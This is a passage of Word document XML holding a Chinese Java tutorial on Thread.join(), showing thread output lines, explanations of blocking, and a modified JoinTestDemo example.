          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>结束了，此线程才能向下执行。</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[CustomThread1] Thread loop at 2//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>继续执行</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[CustomThread1] Thread loop at 3//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>继续执行</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[CustomThread1] Thread loop at 4//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>继续执行</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[CustomThread1] Thread end. //</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>结束了</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 xml:space="preserve">[CustomThread] Thread end.// </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>阻塞处起动，向下继续执行的结果</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main end!//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>结束，此线程在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>阻塞处起动，向下继续执行的结果。</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 </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修改一下代码，得到代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里只写出修改的部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00FE3CD0" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="212" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="473" name="Codehighlighter1_26_612_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/Expanded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highlighter1_26_612_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> JoinTestDemo {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 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="474" name="Codehighlighter1_74_607_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_74_607_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> main(String[] args) {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 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="475" name="图片 63"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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String threadName = Thread.currentThread().getName();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 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="476" name="图片 64"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " start.");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 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="477" name="图片 65"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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CustomThread1 t1 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> CustomThread1();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 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="478" name="图片 66"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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CustomThread t = </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> CustomThread(t1);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 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="479" name="Codehighlighter1_312_452_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_312_452_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> {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 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="480" name="图片 68"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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t1.start();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 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="481" name="图片 69"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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Thread.sleep(2000);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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="482" name="图片 70"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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t.start();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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="483" name="图片 71"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//          t.join();//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在代碼</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>里，將此處注釋掉</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="484" name="Codehighlighter1_474_545_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_474_545_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
